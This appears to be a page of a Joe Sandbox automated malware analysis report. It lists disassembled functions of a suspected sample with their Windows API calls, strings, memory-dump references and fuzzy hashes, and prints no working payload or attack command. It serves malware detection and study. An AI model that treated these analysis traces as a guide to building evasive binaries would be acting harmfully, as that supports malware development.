                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharLower
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 707087890-567219261
                                                                      • Opcode ID: 5ac38d9dedf2c9eb13315bd5ce535341b2e624579ccaf1ec6addb2cc3f27d6a9
                                                                      • Instruction ID: a307dddd8a6383ddbdd0aa96a57734bb34d575b78b83ca14a5af6b91cb6e6c5e
                                                                      • Opcode Fuzzy Hash: 5ac38d9dedf2c9eb13315bd5ce535341b2e624579ccaf1ec6addb2cc3f27d6a9
                                                                      • Instruction Fuzzy Hash: 0C519035E011169BCF14EF6CD9419BEB7B5BFA4724B204229E826E72C5EB39DD40C790
                                                                      Function 00A4372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoInitialize.OLE32 ref: 00A43774
                                                                      • CoUninitialize.OLE32 ref: 00A4377F
                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00A5FB78,?), ref: 00A437D9
                                                                      • IIDFromString.OLE32(?,?), ref: 00A4384C
                                                                      • VariantInit.OLEAUT32(?), ref: 00A438E4
                                                                      • VariantClear.OLEAUT32(?), ref: 00A43936
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 636576611-1287834457
                                                                      • Opcode ID: 3a05b55f34f6b6fa380294d0487b561e92a88c65491334753eb2e058da46daee
                                                                      • Instruction ID: b6c7060e837f9dba3a5396fd84ffe82f19b03541a48a8c2f77789e330b4d6146
                                                                      • Opcode Fuzzy Hash: 3a05b55f34f6b6fa380294d0487b561e92a88c65491334753eb2e058da46daee
                                                                      • Instruction Fuzzy Hash: A761AC76608311AFDB10DF54C889F6ABBE8FF88711F104819F9859B291D770EE49CB92
                                                                      Function 00A33388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00A333CF
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A333F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-3080491070
                                                                      • Opcode ID: b60319b0916a8acf07a1856b7bdae9a1b4d0e02136326cc4dc65dac905a396db
                                                                      • Instruction ID: ba21bea0186e265c72785cde7a695fcc7e83f611c78ed2f4e7cafe6f776f0c64
                                                                      • Opcode Fuzzy Hash: b60319b0916a8acf07a1856b7bdae9a1b4d0e02136326cc4dc65dac905a396db
                                                                      • Instruction Fuzzy Hash: 4C516D32D40209BADF15EBE0DE46FEEB778AF44740F108569B50572092EB356F58CB61
                                                                      Function 00A2B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 1256254125-769500911
                                                                      • Opcode ID: 4ead0f05c26552516beee98527644e3dddc3f4de9d47b8f46968ae2f44ada3b4
                                                                      • Instruction ID: 46c1c9c884d373bcdcf3cb40374bfdd291e83e4672a6a43a76fbbd1da6c5ac51
                                                                      • Opcode Fuzzy Hash: 4ead0f05c26552516beee98527644e3dddc3f4de9d47b8f46968ae2f44ada3b4
                                                                      • Instruction Fuzzy Hash: 9D41B632A111379BCB206F7D9C905BE77B5BFA0B94B244539E462DB284E735CD81C7A0
                                                                      Function 00A35393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00A353A0
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A35416
                                                                      • GetLastError.KERNEL32 ref: 00A35420
                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00A354A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: 49722581a54e62b998974119564c751df4237b646541218a1d241b8bbb6b08e0
                                                                      • Instruction ID: 04240408bdc60675215ff405ce279f1ecdc8c625705f0380657f9d3416175fdd
                                                                      • Opcode Fuzzy Hash: 49722581a54e62b998974119564c751df4237b646541218a1d241b8bbb6b08e0
                                                                      • Instruction Fuzzy Hash: 7F318935E006049FD718EF6CC884BAABBB5FF44305F148069F8068B2A2DB31DD82CB91
                                                                      Function 00A53C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateMenu.USER32 ref: 00A53C79
                                                                      • SetMenu.USER32(?,00000000), ref: 00A53C88
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A53D10
                                                                      • IsMenu.USER32(?), ref: 00A53D24
                                                                      • CreatePopupMenu.USER32 ref: 00A53D2E
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A53D5B
                                                                      • DrawMenuBar.USER32 ref: 00A53D63
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                      • String ID: 0$F
                                                                      • API String ID: 161812096-3044882817
                                                                      • Opcode ID: dd332463ce5fbf6d6771435325e064225c671b7954f3b491acdbd2c70d90db56
                                                                      • Instruction ID: 685daa3a907af66e306d3af82fb65fa458535ce5e18ceb9dd864fa5a495cce0d
                                                                      • Opcode Fuzzy Hash: dd332463ce5fbf6d6771435325e064225c671b7954f3b491acdbd2c70d90db56
                                                                      • Instruction Fuzzy Hash: 80415676A01309AFDF14CFA4D884BAA7BB5FF89391F140429ED46A7360D730AA15CB90
                                                                      Function 00A53A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A53A9D
                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A53AA0
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A53AC7
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A53AEA
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A53B62
                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00A53BAC
                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00A53BC7
                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00A53BE2
                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00A53BF6
                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00A53C13
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 312131281-0
                                                                      • Opcode ID: fe82c94943c949cc1c27eaf8f6c07b422911fe9be4218e809d8b783c7d38fee3
                                                                      • Instruction ID: efff284dba8c88168c84f0f4a9c49356ee50787f2ba08ac695f2c7cfb00af348
                                                                      • Opcode Fuzzy Hash: fe82c94943c949cc1c27eaf8f6c07b422911fe9be4218e809d8b783c7d38fee3
                                                                      • Instruction Fuzzy Hash: 01616C75A00248AFDB11DFA8CC81EEE77B8FB49710F10419AFA15E7291C774AE49DB50
                                                                      Function 00A2B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A2B151
                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B165
                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00A2B16C
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B17B
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A2B18D
                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B1A6
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B1B8
                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B1FD
                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B212
                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B21D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: 05adbb51ab8344e0cb604bf94cf934eb17b2e3bb0c36babfe7e236ce677a019e
                                                                      • Instruction ID: 8062cafe65b66a0e9f64780ac72f558c77f9f18d415a8c6ce2694c8996e3f3a0
                                                                      • Opcode Fuzzy Hash: 05adbb51ab8344e0cb604bf94cf934eb17b2e3bb0c36babfe7e236ce677a019e
                                                                      • Instruction Fuzzy Hash: D0317F72620314EFDB10DFA8EC44BAE7BB9BB51322F104125FA05D61A1DBB49A42CB70
                                                                      Function 009F2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 009F2C94
                                                                        • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000), ref: 009F29DE
                                                                        • Part of subcall function 009F29C8: GetLastError.KERNEL32(00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000,00000000), ref: 009F29F0
                                                                      • _free.LIBCMT ref: 009F2CA0
                                                                      • _free.LIBCMT ref: 009F2CAB
                                                                      • _free.LIBCMT ref: 009F2CB6
                                                                      • _free.LIBCMT ref: 009F2CC1
                                                                      • _free.LIBCMT ref: 009F2CCC
                                                                      • _free.LIBCMT ref: 009F2CD7
                                                                      • _free.LIBCMT ref: 009F2CE2
                                                                      • _free.LIBCMT ref: 009F2CED
                                                                      • _free.LIBCMT ref: 009F2CFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 7098d777ad2dcf9e01eabea6d5be60adc47228819ebe3932f22528762ad55077
                                                                      • Instruction ID: f18dabf9773c837c5f498eb9640a99ff93b51a3ca78c7f45fa91dedbc2f84536
                                                                      • Opcode Fuzzy Hash: 7098d777ad2dcf9e01eabea6d5be60adc47228819ebe3932f22528762ad55077
                                                                      • Instruction Fuzzy Hash: 5511B97614010DBFCB02EF54D942EED3BA5FF45350F5144A5FA485F222D671EE909B90
                                                                      Function 009C1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009C1459
                                                                      • OleUninitialize.OLE32(?,00000000), ref: 009C14F8
                                                                      • UnregisterHotKey.USER32(?), ref: 009C16DD
                                                                      • DestroyWindow.USER32(?), ref: 00A024B9
                                                                      • FreeLibrary.KERNEL32(?), ref: 00A0251E
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A0254B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                      • String ID: close all
                                                                      • API String ID: 469580280-3243417748
                                                                      • Opcode ID: 4c1ae39a303ec8dfbcaadd9d4c3c4b0c9900bc236eb85eb3234c73b03a54db8e
                                                                      • Instruction ID: 5d1e7840eb4240213c6f89b4bf5d3e9225d7c50f6209b6974d8739cc19d4aba9
                                                                      • Opcode Fuzzy Hash: 4c1ae39a303ec8dfbcaadd9d4c3c4b0c9900bc236eb85eb3234c73b03a54db8e
                                                                      • Instruction Fuzzy Hash: C9D17931B012128FCB19EF14D999F29F7A4BF45710F1442ADE84A6B2A2CB31AD12CF59
                                                                      Function 00A37DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A37FAD
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A37FC1
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00A37FEB
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00A38005
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A38017
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A38060
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A380B0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                      • String ID: *.*
                                                                      • API String ID: 769691225-438819550
                                                                      • Opcode ID: c99522fb81ca215728e80c788bd38e599d86f5f0d038a5dd2372169a1198cd6c
                                                                      • Instruction ID: 1cd60bbb6f589dbf2b75bda43ff4d9eadd1acbd67181b40387ef3bed7579f4fc
                                                                      • Opcode Fuzzy Hash: c99522fb81ca215728e80c788bd38e599d86f5f0d038a5dd2372169a1198cd6c
                                                                      • Instruction Fuzzy Hash: FD818DB25083459FCB24EF54C885AAEB3E8BF89310F64486EF885D7251EB34DD498B52
                                                                      Function 009C5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 009C5C7A
                                                                        • Part of subcall function 009C5D0A: GetClientRect.USER32(?,?), ref: 009C5D30
                                                                        • Part of subcall function 009C5D0A: GetWindowRect.USER32(?,?), ref: 009C5D71
                                                                        • Part of subcall function 009C5D0A: ScreenToClient.USER32(?,?), ref: 009C5D99
                                                                      • GetDC.USER32 ref: 00A046F5
                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A04708
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00A04716
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00A0472B
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00A04733
                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A047C4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                      • String ID: U
                                                                      • API String ID: 4009187628-3372436214
                                                                      • Opcode ID: ec46d368ad7d47d1aa0cf0495153ee9d34e5fb9d6b9cb4f5d057b66f355ad337
                                                                      • Instruction ID: 89d53a4b71033b593fbd07978b82893c46c937217923639438c3ae5c60378a48
                                                                      • Opcode Fuzzy Hash: ec46d368ad7d47d1aa0cf0495153ee9d34e5fb9d6b9cb4f5d057b66f355ad337
                                                                      • Instruction Fuzzy Hash: BB71F070900209DFCF21CF64D984ABA3BB5FF4A360F144269EE515A2A6D7319C81DF60
                                                                      Function 00A3359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00A335E4
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • LoadStringW.USER32(00A92390,?,00000FFF,?), ref: 00A3360A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-2391861430
                                                                      • Opcode ID: cb8ee31e721f0caf9d2c7c81b21a8f3de2c80dfe76a4b45bc826b5050b98f37b
                                                                      • Instruction ID: 3dfe3cee3e3a7a9a5cd1f29dba94d9a6a3a12c67675f44bb9b5e8b2f353ee087
                                                                      • Opcode Fuzzy Hash: cb8ee31e721f0caf9d2c7c81b21a8f3de2c80dfe76a4b45bc826b5050b98f37b
                                                                      • Instruction Fuzzy Hash: 1B516B72D0020ABBDF14EBE0DD46FEEBB38AF44340F148129F105721A1EB305A99DBA1
                                                                      Function 00A58B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                        • Part of subcall function 009D912D: GetCursorPos.USER32(?), ref: 009D9141
                                                                        • Part of subcall function 009D912D: ScreenToClient.USER32(00000000,?), ref: 009D915E
                                                                        • Part of subcall function 009D912D: GetAsyncKeyState.USER32(00000001), ref: 009D9183
                                                                        • Part of subcall function 009D912D: GetAsyncKeyState.USER32(00000002), ref: 009D919D
                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00A58B6B
                                                                      • ImageList_EndDrag.COMCTL32 ref: 00A58B71
                                                                      • ReleaseCapture.USER32 ref: 00A58B77
                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00A58C12
                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A58C25
                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00A58CFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
